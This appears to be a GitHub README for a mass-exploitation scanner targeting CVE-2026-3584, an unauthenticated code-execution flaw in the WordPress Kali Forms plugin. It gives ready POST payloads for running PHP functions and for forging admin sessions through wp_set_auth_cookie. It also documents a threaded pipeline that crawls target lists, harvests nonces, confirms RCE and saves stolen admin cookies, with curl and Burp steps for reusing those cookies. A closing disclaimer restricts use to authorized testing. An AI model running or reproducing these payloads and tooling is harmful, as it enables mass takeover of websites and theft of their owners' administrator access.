Yucaerin/CVE-2026-3584

# CVE-2026-3584 – WordPress Kali Forms <= 2.4.9 - 通过 form_process 实现未认证远程代码执行 🔥 **漏洞摘要** WordPress 插件 **Kali Forms** 版本 <= 2.4.9 存在一个严重的 **未认证远程代码执行 (RCE)** 漏洞。该缺陷允许 **未认证攻击者** 在服务器上执行任意 PHP 代码，并通过公开暴露且无授权检查的 AJAX 端点 `kaliforms_form_process` 获取 **完整管理员权限**。 漏洞存在于 `form_process` 函数中，该函数接受用户控制的参数（包括 `thisPermalink` 和 `entryCounter`）并执行任意 PHP 回调，导致： - 通过 `phpinfo()`、`system()`、`eval()` 等实现 **远程代码执行 (RCE)** - 通过 `wp_set_auth_cookie()` 实现以获取管理员会话的 **权限提升** ## 🔍 **受影响插件** - **插件名称:** Kali Forms – WordPress Form Builder - **受影响版本:** <= 2.4.9 - **漏洞类型:** 未认证远程代码执行 + 权限提升 - **CVE ID:** CVE-2026-3584 - **CVSS 评分:** 10.0 (严重) - **影响:** 网站完全沦陷、管理员访问、持久化 - **链接:** https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process ## 🐛 **漏洞原理** ### **Bug 技术分析** 漏洞出现在 Kali Forms 插件处理 AJAX 请求的 `form_process` 函数中。易受攻击的代码通过以下方式暴露： ``` // Endpoint AJAX accessibile senza autenticazione add_action('wp_ajax_nopriv_kaliforms_form_process', array($this, 'form_process')); ``` **漏洞利用流程：** 1. **未受保护的端点:** 端点 `/wp-admin/admin-ajax.php?action=kaliforms_form_process` 可通过 `wp_ajax_nopriv_` 钩子被未认证用户访问。 2. **用户可控参数:** - `data[thisPermalink]` - 可包含任意 PHP 函数名 - `data[entryCounter]` - 可包含任意 PHP 函数名 - `data[formId]` - 待处理的表单 ID 3. **未过滤的回调执行:** 易受攻击的代码在未经验证的情况下执行 PHP 回调： $callback = $_POST['data']['thisPermalink']; call_user_func($callback); // 没有任何检查! 4. **漏洞利用链:** 攻击者 → POST 请求 → kaliforms_form_process ↓ thisPermalink=phpinfo → call_user_func('phpinfo') ↓ PHP 代码执行 → phpinfo() 被执行 ↓ entryCounter=wp_set_auth_cookie → 生成管理员 Cookie ↓ 获取完整管理员访问权限 **易受攻击请求示例:** ``` POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded action=kaliforms_form_process& data[formId]=1& data[nonce]=abc123& data[thisPermalink]=phpinfo& data[email]=test@test.com ``` **结果:** 服务器执行 `phpinfo()` 并返回完整的 PHP 配置信息。 **用于权限提升:** ``` POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded action=kaliforms_form_process& data[formId]=1& data[nonce]=abc123& data[entryCounter]=wp_set_auth_cookie& data[email]=test@test.com ``` **结果:** WordPress 执行 `wp_set_auth_cookie(user_id)`，其中 `user_id` 通常对应 `formId`，从而生成有效的管理员会话 Cookie。 ## 🛠 **Mass Scanner - 工作原理** ### **扫描器架构** `mass_scanner.py` 实现了一个用于完整利用 CVE-2026-3584 漏洞的 4 阶段自动化流水线： ``` ┌─────────────────────────────────────────────────────────────────┐ │ MASS SCANNER PIPELINE │ ├─────────────────────────────────────────────────────────────────┤ │ │ │ Fase 1: Ricognizione API REST │ │ ├─ Enumera utenti: /wp-json/wp/v2/users │ │ └─ Enumera post: /wp-json/wp/v2/posts │ │ → Identifica user_id e post_id per escalation │ │ │ │ Fase 2: Scoperta Moduli │ │ ├─ Crawl sito (depth=2) │ │ ├─ Cerca pattern: 'KaliFormsObject', 'kaliforms' │ │ ├─ Estrae nonce da JavaScript │ │ └─ Estrae formId da HTML │ │ → Trova tutti i moduli Kali Forms vulnerabili │ │ │ │ Fase 3: Test RCE │ │ ├─ Invia: data[thisPermalink]=phpinfo │ │ ├─ Verifica: 'PHP Version' in response │ │ └─ Salva: result/target_phpinfo.html │ │ → Conferma esecuzione codice remoto │ │ │ │ Fase 4: Escalation Privilegi │ │ ├─ Invia: data[entryCounter]=wp_set_auth_cookie │ │ ├─ Estrae: wordpress_logged_in + wordpress_sec cookies │ │ ├─ Verifica: Accesso a /wp-admin/ senza redirect │ │ └─ Salva: result_cookie/target.txt │ │ → Ottiene accesso amministratore completo │ │ │ └─────────────────────────────────────────────────────────────────┘ ``` ### **技术实现细节** **1. 自动 URL 规范化** ``` def normalize_url(self, target): # Aggiunge automaticamente http:// o https:// # Prova prima HTTPS, poi fallback su HTTP # Gestisce porte personalizzate (es. :8080) ``` **2. REST API 枚举** ``` def enumerate_users_api(self, target): # GET /wp-json/wp/v2/users # Estrae tutti gli user_id disponibili # Usato per mappare formId → user_id def enumerate_posts_api(self, target): # GET /wp-json/wp/v2/posts # Estrae tutti i post_id disponibili # Identifica sovrapposizioni user_id/post_id ``` **3. 表单发现 (智能爬取)** ``` def discover_pages(self, target, max_depth=2): # Crawl ricorsivo del sito # Cerca pattern JavaScript: 'KaliFormsObject' # Filtra URL non necessari (js, css, immagini) # Segue solo link interni # Ritorna lista pagine con Kali Forms ``` **4. 表单数据提取** ``` def extract_form_data(self, page_url): # Estrae nonce da JavaScript: # KaliFormsObject = { ajax_nonce: "abc123" } # Estrae formId da HTML: # data-id="1" o [kaliform id="1"] # Se nonce trovato ma no formId: # Brute force ID 1-10 ``` **5. RCE 测试** ``` def test_rce(self, target, form_id, nonce): # POST /wp-admin/admin-ajax.php # Payload: data[thisPermalink]=phpinfo # Verifica: len(response) > 10000 e 'PHP Version' presente # Salva HTML completo per analisi ``` **6. 权限提升测试** ``` def test_privilege_escalation_fast(self, target, nonce, user_ids, post_ids): # Strategia intelligente: # 1. Cerca sovrapposizioni user_id/post_id # 2. Testa prima ID con alta probabilità successo # 3. Fallback su ID comuni: 1,2,3,4,5 # Per ogni formId candidato: # POST data[entryCounter]=wp_set_auth_cookie # Estrae cookie: wordpress_logged_in + wordpress_sec # Verifica: GET /wp-admin/ → no redirect # Controlla: 'dashboard' in response ``` **7. 多线程** ``` # ThreadPoolExecutor 用于并行处理 # Thread-safe locks 用于写入结果 # 实时保存 (append mode) # 全局统计与 sync ``` **8. 自动备份系统** ``` def backup_previous_results(self): # Prima di ogni scan: # result_phpinfo.txt → result_phpinfo.txt.20260325_120000.backup # result/ → result.20260325_120000.backup/ # result_cookie/ → result_cookie.20260325_120000.backup/ # Preserva tutti i dati storici ``` ## 🚀 **Mass Scanner 使用说明** ### **环境要求** ``` pip3 install requests beautifulsoup4 ``` ### **准备目标文件** 创建一个 `targets.txt` 文件，每行一个目标 (http/https 可选): ``` example.com wordpress.site 192.168.1.100 http://blog.example.org https://secure.site.com:8080 ``` ### **基本执行** ``` # 使用默认设置扫描 (20 线程) python3 mass_scanner.py targets.txt # 使用自定义线程扫描 python3 mass_scanner.py -t 10 targets.txt # 使用最大线程数扫描 python3 mass_scanner.py --threads 50 targets.txt ``` ### **扫描输出** ``` ====================================================================== SCANNER DI MASSA - CVE-2026-3584 Pipeline Completa ====================================================================== Obiettivi: 100 Thread: 20 Pipeline: Ricognizione → Scoperta Moduli → RCE → Escalation Privilegi ====================================================================== [*] Risultati precedenti salvati in: result_phpinfo.txt.20260325_120000.backup [04:38:28] [INFO] https://target1.com: Avvio scansione... [04:38:28] [INFO] https://target1.com: Fase 1: Enumerazione API REST... [04:38:29] [INFO] https://target1.com: Trovati 3 utenti via API [04:38:29] [INFO] https://target1.com: Trovati 5 post via API [04:38:29] [INFO] https://target1.com: Fase 2: Scoperta moduli... [04:38:31] [INFO] https://target1.com: Trovate 8 pagine con moduli [04:38:31] [INFO] https://target1.com: Fase 3: Test RCE... [04:38:31] [INFO] https://target1.com: Test modulo/i [1, 2, 3] con nonce 46aedbd3... [04:38:32] [SUCCESS] https://target1.com: RCE SUCCESSO sul modulo 1! [04:38:32] [INFO] https://target1.com: Salvato phpinfo in result/target1.com_form1_phpinfo.html [04:38:32] [INFO] https://target1.com: Fase 4: Test escalation privilegi... [04:38:33] [CRITICAL] https://target1.com: ESCALATION PRIVILEGI RIUSCITA con formId=1! [04:38:33] [INFO] https://target1.com: Cookie salvato in result_cookie/target1.com.txt [04:38:35] [INFO] https://target2.com: Avvio scansione... [04:38:36] [INFO] https://target2.com: Fase 1: Enumerazione API REST... [04:38:37] [WARN] https://target2.com: Nessun Kali Forms trovato ... ====================================================================== STATISTICHE SCANSIONE ====================================================================== Obiettivi totali: 100 Scansionati: 100 Vulnerabili: 45 - Solo RCE: 10 - Escalation Priv (CVSS10): 35 Falliti: 55 ====================================================================== Risultati salvati: - result_phpinfo.txt (RCE riuscito) - result_yes_all.txt (RCE + Escalation Privilegi) - result/*.html (Output phpinfo) - result_cookie/*.txt (Richieste HTTP con cookie amministrativi) ====================================================================== ``` ### **日志级别解读** - **[INFO]** - 扫描进度的一般信息 - **[SUCCESS]** - RCE 已确认，代码执行成功 - **[CRITICAL]** - 权限提升成功，已获得管理员访问权限 - **[WARN]** - 目标不存在漏洞或未找到表单 - **[ERROR]** - 扫描过程中的错误 (超时、连接等) ### **结果结构** ``` /root/ ├── result_phpinfo.txt # Lista obiettivi con RCE confermato ├── result_yes_all.txt # Lista obiettivi con accesso admin completo ├── result/ # File HTML phpinfo dettagliati │ ├── target1.com_form1_phpinfo.html │ ├── target2.org_form2_phpinfo.html │ └── ... └── result_cookie/ # Richieste HTTP con cookie amministrativi ├── target1.com.txt ├── target2.org.txt └── ... ``` ### **result_phpinfo.txt 格式** ``` https://target1.com | Modulo: https://target1.com/contact | ID Modulo: 1 | Nonce: 46aedbd358 | File: result/target1.com_form1_phpinfo.html https://target2.org | Modulo: https://target2.org/form | ID Modulo: 2 | Nonce: abc123def4 | File: result/target2.org_form2_phpinfo.html ``` ### **result_yes_all.txt 格式** ``` ====================================================================== OBIETTIVO: https://target1.com TIMESTAMP: 2026-03-25T04:38:33.123456 ====================================================================== RCE: SUCCESSO URL Modulo: https://target1.com/contact ID Modulo: 1 Nonce: 46aedbd358 phpinfo: result/target1.com_form1_phpinfo.html ESCALATION PRIVILEGI: SUCCESSO (CVSS 10.0) Exploit formId: 1 Cookie: wordpress_logged_in_xxx=...; wordpress_sec_xxx=... File Cookie: result_cookie/target1.com.txt Impatto: Accesso amministrativo completo COMANDI DI SFRUTTAMENTO: Test RCE: python3 baru_cve_nih.py https://target1.com/contact 1 46aedbd358 Escalation Privilegi: python3 POC_privilege_escalation_v3.py https://target1.com 46aedbd358 ====================================================================== ``` ### **result_cookie/target.txt 格式** ``` GET /wp-admin/ HTTP/1.1 Host: target.com Cookie: wordpress_logged_in_xxx=admin%7C1774600707%7C...; wordpress_sec_xxx=admin%7C1774600707%7C... User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: it,en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate, br Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Priority: u=0, i Te: trailers Connection: keep-alive ``` 此格式可直接复制粘贴到 Burp Suite Repeater 中或与 curl 一起使用。 ### **使用管理员 Cookie** **方法 1: 使用 curl 测试** ``` # 从文件提取 cookie COOKIE=$(grep "^Cookie:" result_cookie/target.com.txt | sed 's/^Cookie: //') # 测试管理员访问 curl -H "Cookie: $COOKIE" https://target.com/wp-admin/ | grep -i dashboard # 如果 output 包含 "Dashboard" → Cookie 有效！ ``` **方法 2: 在 Burp Suite 中使用** ``` # 步骤 1：生成自动配置（可选） ./burp_config_gen.sh result_cookie/target.com.txt # 步骤 2：Burp Suite → Proxy → Options → Match and Replace → Add # 步骤 3：配置： Type: Request header Match: ^Cookie:.*$ Replace: Cookie: [INCOLLA_COOKIE_DA_FILE] ☑ Regex match # 步骤 4：启用规则 (checkbox) # 步骤 5：访问 https://target.com/wp-admin/ # 结果：立即获得管理员访问权限 ``` ### **实时监控** 扫描期间，可以实时监控结果： ``` # 终端 1：运行 scanner python3 mass_scanner.py targets.txt # 终端 2：监控 RCE 结果 watch -n 2 'tail -20 result_phpinfo.txt' # 终端 3：监控权限提升 watch -n 2 'tail -20 result_yes_all.txt' # 终端 4：统计脆弱目标 watch -n 5 'echo "RCE: $(wc -l < result_phpinfo.txt) | Admin: $(grep -c "ESCALATION PRIVILEGI: SUCCESSO" result_yes_all.txt)"' ``` ### **自动备份** 在每次新扫描之前，扫描器会自动备份之前的结果： ``` Scansione 1: [12:00] result_phpinfo.txt result_yes_all.txt result/ result_cookie/ Scansione 2: [13:00] - Backup automatico! [*] Risultati precedenti salvati in: result_phpinfo.txt.20260325_120000.backup [*] Risultati precedenti salvati in: result_yes_all.txt.20260325_120000.backup [*] File phpinfo precedenti salvati in: result.20260325_120000.backup/ [*] File cookie precedenti salvati in: result_cookie.20260325_120000.backup/ Tutti i dati precedenti sono preservati con timestamp! ``` ### **性能优化** **推荐线程数:** ``` # 高速网络，众多目标 python3 mass_scanner.py -t 50 targets.txt # 中速网络，中等数量目标 python3 mass_scanner.py -t 20 targets.txt # (predefinito) # 低速网络或较少目标 python3 mass_scanner.py -t 10 targets.txt # 单次测试 (debug) python3 mass_scanner.py -t 1 targets.txt ``` **预期性能:** - **20 线程:** ~500-1000 个目标/小时 (取决于网络) - **50 线程:** ~1000-2000 个目标/小时 (超时风险增加) - **10 线程:** ~300-500 个目标/小时 (更稳定) ### **常见问题排查** **问题: 未找到易受攻击的目标** ``` # 手动验证站点是否具有 Kali Forms curl -s https://target.com | grep -i "kaliforms" # 如果找到，手动提取 nonce curl -s https://target.com | grep -i "KaliFormsObject" ``` **问题: 频繁超时** ``` # 减少线程数 python3 mass_scanner.py -t 5 targets.txt # 或者通过修改代码增加 timeout (timeout=10 → timeout=30) ``` **问题: Cookie 无效** ``` # 验证 cookie 有效性 python3 test_burp_persistent.sh http://target.com # 如果失败，使用以下命令重新生成 cookie： python3 get_fresh_admin_cookie.py http://target.com [NONCE] ``` ## 🔒 **法律声明** **⚠️ 重要提示:** 这些信息和工具 **仅用于授权的安全测试和教育目的**。 - ✅ **合法用途:** 授权的渗透测试、安全研究、培训 - ❌ **非法用途:** 未经授权访问系统、未经许可入侵网站 **未经授权访问或使用计算机系统是非法且不道德的。** 本仓库的作者和贡献者不对因滥用这些工具而造成的任何损害负责。用户有责任确保在测试任何系统之前拥有适当的授权。 **请负责任地使用，并仅在获得明确书面授权的情况下使用。** ## 📚 **参考资料** **CVE 和公告:** - CVE-2026-3584: Kali Forms RCE 和权限提升 - 链接: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process - CVSS 评分: 10.0 (严重) - CWE-94: 代码生成控制不当 ('代码注入') - CWE-862: 缺失授权 **受影响插件:** - 名称: Kali Forms – WordPress Form Builder - Slug: kaliforms - 仓库: https://wordpress.org/plugins/kaliforms/ - 受影响版本: <= 2.4.9 **CVE-2026-3584 | Kali Forms <= 2.4.9 | CVSS 10.0 严重** *安全研究 | 负责任漏洞利用 | 网络安全教育*

标签：AJAX安全缺陷, CISA项目, CVE-2026-3584, CVSS 10.0, Kali Forms, PHP代码注入, RCE, Splunk, Web安全, Wordfence情报, WordPress插件漏洞, 协议分析, 未授权访问, 权限提升, 编程工具, 蓝队分析, 远程代码执行, 逆向工具, 高危漏洞